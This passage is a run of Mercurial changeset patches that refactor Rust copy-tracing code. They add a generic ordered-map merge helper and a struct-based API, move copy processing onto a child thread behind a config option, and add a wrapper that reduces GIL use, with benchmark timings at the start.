µs/rev mozilla-try x0000_revs_xx000_added_x_copies 156f6e2674f2 4d0f2c178e66 : 8598 revs, 7.682665 s, 0.084038 s, -7.598627 s, × 0.010939, 9 µs/rev mozilla-try x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 6.894680 s, 0.027306 s, -6.867374 s, × 0.003960, 44 µs/rev mozilla-try x0000_revs_xx000_added_x000_copies 89294cd501d9 7ccb2fc7ccb5 : 97052 revs, 7.650907 s, 1.465264 s, -6.185643 s, × 0.191515, 15 µs/rev mozilla-try x0000_revs_x0000_added_x0000_copies e928c65095ed e951f4ad123a : 52031 revs, 9.898788 s, 0.690376 s, -9.208412 s, × 0.069743, 13 µs/rev mozilla-try x00000_revs_x_added_0_copies 6a320851d377 1ebb79acd503 : 363753 revs, 0.092208 s, 4.011322 s, +3.919114 s, × 43.50297, 11 µs/rev mozilla-try x00000_revs_x00000_added_0_copies dc8a3ca7010e d16fde900c9c : 34414 revs, 28.130003 s, 0.573541 s, -27.556462 s, × 0.020389, 16 µs/rev mozilla-try x00000_revs_x_added_x_copies 5173c4b6f97c 95d83ee7242d : 362229 revs, 0.093366 s, 3.981133 s, +3.887767 s, × 42.64007, 10 µs/rev mozilla-try x00000_revs_x000_added_x_copies 9126823d0e9c ca82787bb23c : 359344 revs, 0.229368 s, 3.996647 s, +3.767279 s, × 17.42460, 11 µs/rev mozilla-try x00000_revs_x0000_added_x0000_copies 8d3fafa80d4b eb884023b810 : 192665 revs, 19.624851 s, 1.520607 s, -18.104244 s, × 0.077484, 7 µs/rev mozilla-try x00000_revs_x00000_added_x0000_copies 1b661134e2ca 1ae03d022d6d : 228985 revs, 22.070126 s, 50.244975 s, +28.174849 s, × 2.276606, 219 µs/rev mozilla-try x00000_revs_x00000_added_x000_copies 9b2a99adc05e 8e29777b48e6 : 382065 revs, 26.006524 s, 20.030023 s, -5.976501 s, × 0.770192, 52 µs/rev private : 459513 revs, 18.704612 s, 24.490825 s, +5.786213 s, × 1.309347, 53 µs/rev Differential Revision: https://phab.mercurial-scm.org/D9656 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -6,10 +6,10 @@ use im_rc::ordmap::DiffItem; use im_rc::ordmap::Entry; use im_rc::ordmap::OrdMap; +use im_rc::OrdSet; use std::cmp::Ordering; use std::collections::HashMap; -use std::collections::HashSet; use std::convert::TryInto; pub type PathCopies = HashMap<HgPathBuf, HgPathBuf>; @@ -25,7 +25,7 @@ path: Option<PathToken>, /// a set of previous `CopySource.rev` value directly or indirectly /// overwritten by this one. - overwritten: HashSet<Revision>, + overwritten: OrdSet<Revision>, } impl CopySource { @@ -36,7 +36,7 @@ Self { rev, path, - overwritten: HashSet::new(), + overwritten: OrdSet::new(), } } @@ -45,7 +45,7 @@ /// Use this when merging two InternalPathCopies requires active merging of /// some entries. fn new_from_merge(rev: Revision, winner: &Self, loser: &Self) -> Self { - let mut overwritten = HashSet::new(); + let mut overwritten = OrdSet::new(); overwritten.extend(winner.overwritten.iter().copied()); overwritten.extend(loser.overwritten.iter().copied()); overwritten.insert(winner.rev); # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1608720496 -3600 # Wed Dec 23 11:48:16 2020 +0100 # Node ID 435d9fc72646c164dac7079dbdba9ba245c01740 # Parent 60b2b7ecf9cbd30d14ee8fd26f15ae3f942566b2 copies-rust: extract generic map merge logic from merge_copies_dict This deduplicates the copy-tracing-specific logic Differential Revision: https://phab.mercurial-scm.org/D9682 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -3,7 +3,6 @@ use crate::Revision; use crate::NULL_REVISION; -use im_rc::ordmap::DiffItem; use im_rc::ordmap::Entry; use im_rc::ordmap::OrdMap; use im_rc::OrdSet; @@ -624,210 +623,40 @@ fn merge_copies_dict( path_map: &TwoWayPathMap, current_merge: Revision, - mut minor: InternalPathCopies, - mut major: InternalPathCopies, + minor: InternalPathCopies, + major: InternalPathCopies, changes: &ChangedFiles, ) -> InternalPathCopies { - // This closure exist as temporary help while multiple developper are - // actively working on this code. Feel free to re-inline it once this - // code is more settled. - let cmp_value = - |dest: &PathToken, src_minor: &CopySource, src_major: &CopySource| { - compare_value( - path_map, + use crate::utils::{ordmap_union_with_merge, MergeResult}; + + ordmap_union_with_merge(minor, major, |dest, src_minor, src_major| { + let (pick, overwrite) = compare_value( + path_map, + current_merge, + changes, + dest, + src_minor, + src_major, + ); + if overwrite { + let (winner, loser) = match pick { + MergePick::Major | MergePick::Any => (src_major, src_minor), + MergePick::Minor => (src_minor, src_major), + }; + MergeResult::UseNewValue(CopySource::new_from_merge( current_merge, - changes, - dest, - src_minor, - src_major, - ) - }; - if minor.is_empty() { - major - } else if major.is_empty() { - minor - } else if minor.len() * 2 < major.len() { - // Lets says we are merging two InternalPathCopies instance A and B. - // - // If A contains N items, the merge result will never contains more - // than N values differents than the one in A - // - // If B contains M items, with M > N, the merge result will always - // result in a minimum of M - N value differents than the on in - // A - // - // As a result, if N < (M-N), we know that simply iterating over A will - // yield less difference than iterating over the difference - // between A and B. - // - // This help performance a lot in case were a tiny - // InternalPathCopies is merged with a much larger one. - for (dest, src_minor) in minor { - let src_major = major.get(&dest); - match src_major { - None => { - major.insert(dest, src_minor); - } - Some(src_major) => { - let (pick, overwrite) = - cmp_value(&dest, &src_minor, src_major); - if overwrite { - let src = match pick { - MergePick::Major => CopySource::new_from_merge( - current_merge, - src_major, - &src_minor, - ), - MergePick::Minor => CopySource::new_from_merge( - current_merge, - &src_minor, - src_major, - ), - MergePick::Any => CopySource::new_from_merge( - current_merge, - src_major, - &src_minor, - ), - }; - major.insert(dest, src); - } else { - match pick { - MergePick::Any | MergePick::Major => None, - MergePick::Minor => major.insert(dest, src_minor), - }; - } - } - }; - } - major - } else if major.len() * 2 < minor.len() { - // This use the same rational than the previous block. - // (Check previous block documentation for details.) - for (dest, src_major) in major { - let src_minor = minor.get(&dest); - match src_minor { - None => { - minor.insert(dest, src_major); + winner, + loser, + )) + } else { + match pick { + MergePick::Any | MergePick::Major => { + MergeResult::UseRightValue } - Some(src_minor) => { - let (pick, overwrite) = - cmp_value(&dest, src_minor, &src_major); - if overwrite { - let src = match pick { - MergePick::Major => CopySource::new_from_merge( - current_merge, - &src_major, - src_minor, - ), - MergePick::Minor => CopySource::new_from_merge( - current_merge, - src_minor, - &src_major, - ), - MergePick::Any => CopySource::new_from_merge( - current_merge, - &src_major, - src_minor, - ), - }; - minor.insert(dest, src); - } else { - match pick { - MergePick::Any | MergePick::Minor => None, - MergePick::Major => minor.insert(dest, src_major), - }; - } - } - }; - } - minor - } else { - let mut override_minor = Vec::new(); - let mut override_major = Vec::new(); - - let mut to_major = |k: &PathToken, v: &CopySource| { - override_major.push((k.clone(), v.clone())) - }; - let mut to_minor = |k: &PathToken, v: &CopySource| { - override_minor.push((k.clone(), v.clone())) - }; - - // The diff function leverage detection of the identical subpart if - // minor and major has some common ancestors. This make it very - // fast is most case. - // - // In case where the two map are vastly different in size, the current - // approach is still slowish because the iteration will iterate over - // all the "exclusive" content of the larger on. This situation can be - // frequent when the subgraph of revision we are processing has a lot - // of roots. Each roots adding they own fully new map to the mix (and - // likely a small map, if the path from the root to the "main path" is - // small. - // - // We could do better by detecting such situation and processing them - // differently. - for d in minor.diff(&major) { - match d { - DiffItem::Add(k, v) => to_minor(k, v), - DiffItem::Remove(k, v) => to_major(k, v), - DiffItem::Update { old, new } => { - let (dest, src_major) = new; - let (_, src_minor) = old; - let (pick, overwrite) = - cmp_value(dest, src_minor, src_major); - if overwrite { - let src = match pick { - MergePick::Major => CopySource::new_from_merge( - current_merge, - src_major, - src_minor, - ), - MergePick::Minor => CopySource::new_from_merge( - current_merge, - src_minor, - src_major, - ), - MergePick::Any => CopySource::new_from_merge( - current_merge, - src_major, - src_minor, - ), - }; - to_minor(dest, &src); - to_major(dest, &src); - } else { - match pick { - MergePick::Major => to_minor(dest, src_major), - MergePick::Minor => to_major(dest, src_minor), - // If the two entry are identical, no need to do - // anything (but diff should not have yield them) - MergePick::Any => unreachable!(), - } - } - } - }; - } - - let updates; - let mut result; - if override_major.is_empty() { - result = major - } else if override_minor.is_empty() { - result = minor - } else { - if override_minor.len() < override_major.len() { - updates = override_minor; - result = minor; - } else { - updates = override_major; - result = major; - } - for (k, v) in updates { - result.insert(k, v); + MergePick::Minor => MergeResult::UseLeftValue, } } - result - } + }) } /// represent the side that should prevail when merging two diff --git a/rust/hg-core/src/utils.rs b/rust/hg-core/src/utils.rs --- a/rust/hg-core/src/utils.rs +++ b/rust/hg-core/src/utils.rs @@ -9,6 +9,8 @@ use crate::errors::{HgError, IoErrorContext}; use crate::utils::hg_path::HgPath; +use im_rc::ordmap::DiffItem; +use im_rc::ordmap::OrdMap; use std::{io::Write, ops::Deref}; pub mod files; @@ -199,3 +201,151 @@ context: IoErrorContext::CurrentExe, }) } + +pub(crate) enum MergeResult<V> { + UseLeftValue, + UseRightValue, + UseNewValue(V), +} + +/// Return the union of the two given maps, +/// calling `merge(key, left_value, right_value)` to resolve keys that exist in +/// both. +/// +/// CC https://github.com/bodil/im-rs/issues/166 +pub(crate) fn ordmap_union_with_merge<K, V>( + left: OrdMap<K, V>, + right: OrdMap<K, V>, + mut merge: impl FnMut(&K, &V, &V) -> MergeResult<V>, +) -> OrdMap<K, V> +where + K: Clone + Ord, + V: Clone + PartialEq, +{ + if left.ptr_eq(&right) { + // One of the two maps is an unmodified clone of the other + left + } else if left.len() / 2 > right.len() { + // When two maps have different sizes, + // their size difference is a lower bound on + // how many keys of the larger map are not also in the smaller map. + // This in turn is a lower bound on the number of differences in + // `OrdMap::diff` and the "amount of work" that would be done + // by `ordmap_union_with_merge_by_diff`. + // + // Here `left` is more than twice the size of `right`, + // so the number of differences is more than the total size of + // `right`. Therefore an algorithm based on iterating `right` + // is more efficient. + // + // This helps a lot when a tiny (or empty) map is merged + // with a large one. + ordmap_union_with_merge_by_iter(left, right, merge) + } else if left.len() < right.len() / 2 { + // Same as above but with `left` and `right` swapped + ordmap_union_with_merge_by_iter(right, left, |key, a, b| { + // Also swapped in `merge` arguments: + match merge(key, b, a) { + MergeResult::UseNewValue(v) => MergeResult::UseNewValue(v), + // … and swap back in `merge` result: + MergeResult::UseLeftValue => MergeResult::UseRightValue, + MergeResult::UseRightValue => MergeResult::UseLeftValue, + } + }) + } else { + // For maps of similar size, use the algorithm based on `OrdMap::diff` + ordmap_union_with_merge_by_diff(left, right, merge) + } +} + +/// Efficient if `right` is much smaller than `left` +fn ordmap_union_with_merge_by_iter<K, V>( + mut left: OrdMap<K, V>, + right: OrdMap<K, V>, + mut merge: impl FnMut(&K, &V, &V) -> MergeResult<V>, +) -> OrdMap<K, V> +where + K: Clone + Ord, + V: Clone, +{ + for (key, right_value) in right { + match left.get(&key) { + None => { + left.insert(key, right_value); + } + Some(left_value) => match merge(&key, left_value, &right_value) { + MergeResult::UseLeftValue => {} + MergeResult::UseRightValue => { + left.insert(key, right_value); + } + MergeResult::UseNewValue(new_value) => { + left.insert(key, new_value); + } + }, + } + } + left +} + +/// Fallback when both maps are of similar size +fn ordmap_union_with_merge_by_diff<K, V>( + mut left: OrdMap<K, V>, + mut right: OrdMap<K, V>, + mut merge: impl FnMut(&K, &V, &V) -> MergeResult<V>, +) -> OrdMap<K, V> +where + K: Clone + Ord, + V: Clone + PartialEq, +{ + // (key, value) pairs that would need to be inserted in either map + // in order to turn it into the union. + // + // TODO: if/when https://github.com/bodil/im-rs/pull/168 is accepted, + // change these from `Vec<(K, V)>` to `Vec<(&K, Cow<V>)>` + // with `left_updates` only borrowing from `right` and `right_updates` from + // `left`, and with `Cow::Owned` used for `MergeResult::UseNewValue`. + // + // This would allow moving all `.clone()` calls to after we’ve decided + // which of `right_updates` or `left_updates` to use + // (value ones becoming `Cow::into_owned`), + // and avoid making clones we don’t end up using. + let mut left_updates = Vec::new(); + let mut right_updates = Vec::new(); + + for difference in left.diff(&right) { + match difference { + DiffItem::Add(key, value) => { + left_updates.push((key.clone(), value.clone())) + } + DiffItem::Remove(key, value) => { + right_updates.push((key.clone(), value.clone())) + } + DiffItem::Update { + old: (key, left_value), + new: (_, right_value), + } => match merge(key, left_value, right_value) { + MergeResult::UseLeftValue => { + right_updates.push((key.clone(), left_value.clone())) + } + MergeResult::UseRightValue => { + left_updates.push((key.clone(), right_value.clone())) + } + MergeResult::UseNewValue(new_value) => { + left_updates.push((key.clone(), new_value.clone())); + right_updates.push((key.clone(), new_value)) + } + }, + } + } + if left_updates.len() < right_updates.len() { + for (key, value) in left_updates { + left.insert(key, value); + } + left + } else { + for (key, value) in right_updates { + right.insert(key, value); + } + right + } +} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1609876920 -3600 # Tue Jan 05 21:02:00 2021 +0100 # Node ID cb4b0b0c6de4b8d87f62e0a265628d003cd1c10c # Parent 435d9fc72646c164dac7079dbdba9ba245c01740 copies-rust: split up combine_changeset_copies function into a struct … such that each iteration of its former loop is now a method call, with the caller driving the loop. This entirely removes the need for the `DataHolder` hack: the method now takes a `ChangedFiles<'_>` parameter that borrows a bytes buffer that can be owned by the caller’s stack frame, just for the duration of that call. Differential Revision: https://phab.mercurial-scm.org/D9683 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -110,9 +110,6 @@ /// maps CopyDestination to Copy Source (+ a "timestamp" for the operation) type InternalPathCopies = OrdMap<PathToken, CopySource>; -/// hold parent 1, parent 2 and relevant files actions. -pub type RevInfo<'a> = (Revision, Revision, ChangedFiles<'a>); - /// represent the files affected by a changesets /// /// This hold a subset of mercurial.metadata.ChangingFiles as we do not need @@ -334,22 +331,6 @@ } } -/// A small struct whose purpose is to ensure lifetime of bytes referenced in -/// ChangedFiles -/// -/// It is passed to the RevInfoMaker callback who can assign any necessary -/// content to the `data` attribute. The copy tracing code is responsible for -/// keeping the DataHolder alive at least as long as the ChangedFiles object. -pub struct DataHolder<D> { - /// RevInfoMaker callback should assign data referenced by the - /// ChangedFiles struct it return to this attribute. The DataHolder - /// lifetime will be at least as long as the ChangedFiles one. - pub data: Option<D>, -} - -pub type RevInfoMaker<'a, D> = - Box<dyn for<'r> Fn(Revision, &'r mut DataHolder<D>) -> RevInfo<'r> + 'a>; - /// A small "tokenizer" responsible of turning full HgPath into lighter /// PathToken /// @@ -382,82 +363,89 @@ } /// Same as mercurial.copies._combine_changeset_copies, but in Rust. -/// -/// Arguments are: -/// -/// revs: all revisions to be considered -/// children: a {parent ? [childrens]} mapping -/// target_rev: the final revision we are combining copies to -/// rev_info(rev): callback to get revision information: -/// * first parent -/// * second parent -/// * ChangedFiles -/// isancestors(low_rev, high_rev): callback to check if a revision is an -/// ancestor of another -pub fn combine_changeset_copies<D>( - revs: Vec<Revision>, - mut children_count: HashMap<Revision, usize>, - target_rev: Revision, - rev_info: RevInfoMaker<D>, -) -> PathCopies { - let mut all_copies = HashMap::new(); +pub struct CombineChangesetCopies { + all_copies: HashMap<Revision, InternalPathCopies>, + path_map: TwoWayPathMap, + children_count: HashMap<Revision, usize>, +} - let mut path_map = TwoWayPathMap::default(); +impl CombineChangesetCopies { + pub fn new(children_count: HashMap<Revision, usize>) -> Self { + Self { + all_copies: HashMap::new(), + path_map: TwoWayPathMap::default(), + children_count, + } + } - for rev in revs { - let mut d: DataHolder<D> = DataHolder { data: None }; - let (p1, p2, changes) = rev_info(rev, &mut d); - - // We will chain the copies information accumulated for the parent with - // the individual copies information the curent revision. Creating a - // new TimeStampedPath for each `rev` → `children` vertex. + /// Combined the given `changes` data specific to `rev` with the data + /// previously given for its parents (and transitively, its ancestors). + pub fn add_revision( + &mut self, + rev: Revision, + p1: Revision, + p2: Revision, + changes: ChangedFiles<'_>, + ) { // Retrieve data computed in a previous iteration let p1_copies = match p1 { NULL_REVISION => None, _ => get_and_clean_parent_copies( - &mut all_copies, - &mut children_count, + &mut self.all_copies, + &mut self.children_count, p1, ), // will be None if the vertex is not to be traversed }; let p2_copies = match p2 { NULL_REVISION => None, _ => get_and_clean_parent_copies( - &mut all_copies, - &mut children_count, + &mut self.all_copies, + &mut self.children_count, p2, ), // will be None if the vertex is not to be traversed }; // combine it with data for that revision - let (p1_copies, p2_copies) = - chain_changes(&mut path_map, p1_copies, p2_copies, &changes, rev); + let (p1_copies, p2_copies) = chain_changes( + &mut self.path_map, + p1_copies, + p2_copies, + &changes, + rev, + ); let copies = match (p1_copies, p2_copies) { (None, None) => None, (c, None) => c, (None, c) => c, (Some(p1_copies), Some(p2_copies)) => Some(merge_copies_dict( - &path_map, rev, p2_copies, p1_copies, &changes, + &self.path_map, + rev, + p2_copies, + p1_copies, + &changes, )), }; if let Some(c) = copies { - all_copies.insert(rev, c); + self.all_copies.insert(rev, c); } } - // Drop internal information (like the timestamp) and return the final - // mapping. - let tt_result = all_copies - .remove(&target_rev) - .expect("target revision was not processed"); - let mut result = PathCopies::default(); - for (dest, tt_source) in tt_result { - if let Some(path) = tt_source.path { - let path_dest = path_map.untokenize(dest).to_owned(); - let path_path = path_map.untokenize(path).to_owned(); - result.insert(path_dest, path_path); + /// Drop intermediate data (such as which revision a copy was from) and + /// return the final mapping. + pub fn finish(mut self, target_rev: Revision) -> PathCopies { + let tt_result = self + .all_copies + .remove(&target_rev) + .expect("target revision was not processed"); + let mut result = PathCopies::default(); + for (dest, tt_source) in tt_result { + if let Some(path) = tt_source.path { + let path_dest = self.path_map.untokenize(dest).to_owned(); + let path_path = self.path_map.untokenize(path).to_owned(); + result.insert(path_dest, path_path); + } } + result } - result } /// fetch previous computed information diff --git a/rust/hg-cpython/src/copy_tracing.rs b/rust/hg-cpython/src/copy_tracing.rs --- a/rust/hg-cpython/src/copy_tracing.rs +++ b/rust/hg-cpython/src/copy_tracing.rs @@ -8,11 +8,8 @@ use cpython::PyTuple; use cpython::Python; -use hg::copy_tracing::combine_changeset_copies; use hg::copy_tracing::ChangedFiles; -use hg::copy_tracing::DataHolder; -use hg::copy_tracing::RevInfo; -use hg::copy_tracing::RevInfoMaker; +use hg::copy_tracing::CombineChangesetCopies; use hg::Revision; /// Combines copies information contained into revision `revs` to build a copy @@ -26,64 +23,41 @@ target_rev: Revision, rev_info: PyObject, ) -> PyResult<PyDict> { - let revs: PyResult<_> = - revs.iter(py).map(|r| Ok(r.extract(py)?)).collect(); - - // Wrap the `rev_info_maker` python callback as a Rust closure - // - // No errors are expected from the Python side, and they will should only - // happens in case of programing error or severe data corruption. Such - // errors will raise panic and the rust-cpython harness will turn them into - // Python exception. - let rev_info_maker: RevInfoMaker<PyBytes> = - Box::new(|rev: Revision, d: &mut DataHolder<PyBytes>| -> RevInfo { - let res: PyTuple = rev_info - .call(py, (rev,), None) - .expect("rust-copy-tracing: python call to `rev_info` failed") - .cast_into(py) - .expect( - "rust-copy_tracing: python call to `rev_info` returned \ - unexpected non-Tuple value", - ); - let p1 = res.get_item(py, 0).extract(py).expect( - "rust-copy-tracing: rev_info return is invalid, first item \ - is a not a revision", - ); - let p2 = res.get_item(py, 1).extract(py).expect( - "rust-copy-tracing: rev_info return is invalid, first item \ - is a not a revision", - ); - - let files = match res.get_item(py, 2).extract::<PyBytes>(py) { - Ok(raw) => { - // Give responsability for the raw bytes lifetime to - // hg-core - d.data = Some(raw); - let addrs = d.data.as_ref().expect( - "rust-copy-tracing: failed to get a reference to the \ - raw bytes for copy data").data(py); - ChangedFiles::new(addrs) - } - // value was presumably None, meaning they was no copy data. - Err(_) => ChangedFiles::new_empty(), - }; - - (p1, p2, files) - }); - let children_count: PyResult<_> = children_count + let children_count = children_count .items(py) .iter() .map(|(k, v)| Ok((k.extract(py)?, v.extract(py)?))) - .collect(); + .collect::<PyResult<_>>()?; + + /// (Revision number, parent 1, parent 2, copy data for this revision) + type RevInfo = (Revision, Revision, Revision, Option<PyBytes>); + + let revs_info = revs.iter(py).map(|rev_py| -> PyResult<RevInfo> { + let rev = rev_py.extract(py)?; + let tuple: PyTuple = + rev_info.call(py, (rev_py,), None)?.cast_into(py)?; + let p1 = tuple.get_item(py, 0).extract(py)?; + let p2 = tuple.get_item(py, 1).extract(py)?; + let opt_bytes = tuple.get_item(py, 2).extract(py)?; + Ok((rev, p1, p2, opt_bytes)) + }); - let res = combine_changeset_copies( - revs?, - children_count?, - target_rev, - rev_info_maker, - ); + let mut combine_changeset_copies = + CombineChangesetCopies::new(children_count); + + for rev_info in revs_info { + let (rev, p1, p2, opt_bytes) = rev_info?; + let files = match &opt_bytes { + Some(bytes) => ChangedFiles::new(bytes.data(py)), + // value was presumably None, meaning they was no copy data. + None => ChangedFiles::new_empty(), + }; + + combine_changeset_copies.add_revision(rev, p1, p2, files) + } + let path_copies = combine_changeset_copies.finish(target_rev); let out = PyDict::new(py); - for (dest, source) in res.into_iter() { + for (dest, source) in path_copies.into_iter() { out.set_item( py, PyBytes::new(py, &dest.into_vec()), # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1609938541 -3600 # Wed Jan 06 14:09:01 2021 +0100 # Node ID 47557ea79fc77fa6ac7d4aa2888a0b84a601300c # Parent cb4b0b0c6de4b8d87f62e0a265628d003cd1c10c copies-rust: move CPU-heavy Rust processing into a child thread … that runs in parallel with the parent thread fetching data. This can be disabled through a new config. CLI example: hg --config=devel.copy-tracing.multi-thread=no For now both threads use the GIL, later commits will reduce this. Differential Revision: https://phab.mercurial-scm.org/D9684 diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -700,6 +700,11 @@ ) coreconfigitem( b'devel', + b'copy-tracing.multi-thread', + default=True, +) +coreconfigitem( + b'devel', b'debug.extensions', default=False, ) diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -274,6 +274,7 @@ revs = cl.findmissingrevs(common=[a.rev()], heads=[b.rev()]) roots = set() has_graph_roots = False + multi_thread = repo.ui.configbool(b'devel', b'copy-tracing.multi-thread') # iterate over `only(B, A)` for r in revs: @@ -321,7 +322,13 @@ children_count[p] += 1 revinfo = _revinfo_getter(repo, match) return _combine_changeset_copies( - revs, children_count, b.rev(), revinfo, match, isancestor + revs, + children_count, + b.rev(), + revinfo, + match, + isancestor, + multi_thread, ) else: # When not using side-data, we will process the edges "from" the parent. @@ -346,7 +353,7 @@ def _combine_changeset_copies( - revs, children_count, targetrev, revinfo, match, isancestor + revs, children_count, targetrev, revinfo, match, isancestor, multi_thread ): """combine the copies information for each item of iterrevs @@ -363,7 +370,7 @@ if rustmod is not None: final_copies = rustmod.combine_changeset_copies( - list(revs), children_count, targetrev, revinfo + list(revs), children_count, targetrev, revinfo, multi_thread ) else: isancestor = cached_is_ancestor(isancestor) diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -331,6 +331,7 @@ version = "0.1.0" dependencies = [ "cpython 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)", + "crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)", "env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)", "hg-core 0.1.0", "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", diff --git a/rust/hg-cpython/Cargo.toml b/rust/hg-cpython/Cargo.toml --- a/rust/hg-cpython/Cargo.toml +++ b/rust/hg-cpython/Cargo.toml @@ -22,6 +22,7 @@ python3-bin = ["cpython/python3-sys"] [dependencies] +crossbeam-channel = "0.4" hg-core = { path = "../hg-core"} libc = '*' log = "0.4.8" diff --git a/rust/hg-cpython/src/copy_tracing.rs b/rust/hg-cpython/src/copy_tracing.rs --- a/rust/hg-cpython/src/copy_tracing.rs +++ b/rust/hg-cpython/src/copy_tracing.rs @@ -22,6 +22,7 @@ children_count: PyDict, target_rev: Revision, rev_info: PyObject, + multi_thread: bool, ) -> PyResult<PyDict> { let children_count = children_count .items(py) @@ -42,20 +43,81 @@ Ok((rev, p1, p2, opt_bytes)) }); - let mut combine_changeset_copies = - CombineChangesetCopies::new(children_count); + let path_copies = if !multi_thread { + let mut combine_changeset_copies = + CombineChangesetCopies::new(children_count); + + for rev_info in revs_info { + let (rev, p1, p2, opt_bytes) = rev_info?; + let files = match &opt_bytes { + Some(bytes) => ChangedFiles::new(bytes.data(py)), + // Python None was extracted to Option::None, + // meaning there was no copy data. + None => ChangedFiles::new_empty(), + }; + + combine_changeset_copies.add_revision(rev, p1, p2, files) + } + combine_changeset_copies.finish(target_rev) + } else { + // Use a bounded channel to provide back-pressure: + // if the child thread is slower to process revisions than this thread + // is to gather data for them, an unbounded channel would keep + // growing and eat memory. + // + // TODO: tweak the bound? + let (rev_info_sender, rev_info_receiver) = + crossbeam_channel::bounded::<RevInfo>(1000); - for rev_info in revs_info { - let (rev, p1, p2, opt_bytes) = rev_info?; - let files = match &opt_bytes { - Some(bytes) => ChangedFiles::new(bytes.data(py)), - // value was presumably None, meaning they was no copy data. - None => ChangedFiles::new_empty(), - }; + // Start a thread that does CPU-heavy processing in parallel with the + // loop below. + // + // If the parent thread panics, `rev_info_sender` will be dropped and + // “disconnected”. `rev_info_receiver` will be notified of this and + // exit its own loop. + let thread = std::thread::spawn(move || { + let mut combine_changeset_copies = + CombineChangesetCopies::new(children_count); + for (rev, p1, p2, opt_bytes) in rev_info_receiver { + let gil = Python::acquire_gil(); + let py = gil.python(); + let files = match &opt_bytes { + Some(raw) => ChangedFiles::new(raw.data(py)), + // Python None was extracted to Option::None, + // meaning there was no copy data. + None => ChangedFiles::new_empty(), + }; + combine_changeset_copies.add_revision(rev, p1, p2, files) + } + + combine_changeset_copies.finish(target_rev) + }); - combine_changeset_copies.add_revision(rev, p1, p2, files) - } - let path_copies = combine_changeset_copies.finish(target_rev); + for rev_info in revs_info { + let (rev, p1, p2, opt_bytes) = rev_info?; + + // We’d prefer to avoid the child thread calling into Python code, + // but this avoids a potential deadlock on the GIL if it does: + py.allow_threads(|| { + rev_info_sender.send((rev, p1, p2, opt_bytes)).expect( + "combine_changeset_copies: channel is disconnected", + ); + }); + } + // We’d prefer to avoid the child thread calling into Python code, + // but this avoids a potential deadlock on the GIL if it does: + py.allow_threads(|| { + // Disconnect the channel to signal the child thread to stop: + // the `for … in rev_info_receiver` loop will end. + drop(rev_info_sender); + + // Wait for the child thread to stop, and propagate any panic. + thread.join().unwrap_or_else(|panic_payload| { + std::panic::resume_unwind(panic_payload) + }) + }) + }; + let out = PyDict::new(py); for (dest, source) in path_copies.into_iter() { out.set_item( @@ -84,7 +146,8 @@ revs: PyList, children: PyDict, target_rev: Revision, - rev_info: PyObject + rev_info: PyObject, + multi_thread: bool ) ), )?; # HG changeset patch # User Simon Sapin <simon-commits@exyr.org> # Date 1606411431 -3600 # Thu Nov 26 18:23:51 2020 +0100 # Node ID 620c88fb42a24c901a34c1e0028fc5f4e16ba9b4 # Parent 47557ea79fc77fa6ac7d4aa2888a0b84a601300c copies-rust: introduce PyBytesWithData to reduce GIL requirement See explanations in new doc-comments. Differential Revision: https://phab.mercurial-scm.org/D9685 diff --git a/rust/hg-cpython/src/copy_tracing.rs b/rust/hg-cpython/src/copy_tracing.rs --- a/rust/hg-cpython/src/copy_tracing.rs +++ b/rust/hg-cpython/src/copy_tracing.rs @@ -12,6 +12,55 @@ use hg::copy_tracing::CombineChangesetCopies; use hg::Revision; +use self::pybytes_with_data::PyBytesWithData; + +// Module to encapsulate private fields +mod pybytes_with_data { + use cpython::{PyBytes, Python}; + + /// Safe abstraction over a `PyBytes` together with the `&[u8]` slice + /// that borrows it. + /// + /// Calling `PyBytes::data` requires a GIL marker but we want to access the + /// data in a thread that (ideally) does not need to acquire the GIL. + /// This type allows separating the call an the use. + pub(super) struct PyBytesWithData { + #[allow(unused)] + keep_alive: PyBytes, + + /// Borrows the buffer inside `self.keep_alive`, + /// but the borrow-checker cannot express self-referential structs. + data: *const [u8], + } + + fn require_send<T: Send>() {} + + #[allow(unused)] + fn static_assert_pybytes_is_send() { + require_send::<PyBytes>; + } + + // Safety: PyBytes is Send. Raw pointers are not by default, + // but here sending one to another thread is fine since we ensure it stays + // valid. + unsafe impl Send for PyBytesWithData {} + + impl PyBytesWithData { + pub fn new(py: Python, bytes: PyBytes) -> Self { + Self { + data: bytes.data(py), + keep_alive: bytes, + } + } + + pub fn data(&self) -> &[u8] { + // Safety: the raw pointer is valid as long as the PyBytes is still + // alive, and the returned slice borrows `self`. + unsafe { &*self.data } + } + } +} + /// Combines copies information contained into revision `revs` to build a copy /// map. /// @@ -31,17 +80,18 @@ .collect::<PyResult<_>>()?; /// (Revision number, parent 1, parent 2, copy data for this revision) - type RevInfo = (Revision, Revision, Revision, Option<PyBytes>); + type RevInfo<Bytes> = (Revision, Revision, Revision, Option<Bytes>); - let revs_info = revs.iter(py).map(|rev_py| -> PyResult<RevInfo> { - let rev = rev_py.extract(py)?; - let tuple: PyTuple = - rev_info.call(py, (rev_py,), None)?.cast_into(py)?; - let p1 = tuple.get_item(py, 0).extract(py)?; - let p2 = tuple.get_item(py, 1).extract(py)?; - let opt_bytes = tuple.get_item(py, 2).extract(py)?; - Ok((rev, p1, p2, opt_bytes)) - }); + let revs_info = + revs.iter(py).map(|rev_py| -> PyResult<RevInfo<PyBytes>> { + let rev = rev_py.extract(py)?; + let tuple: PyTuple 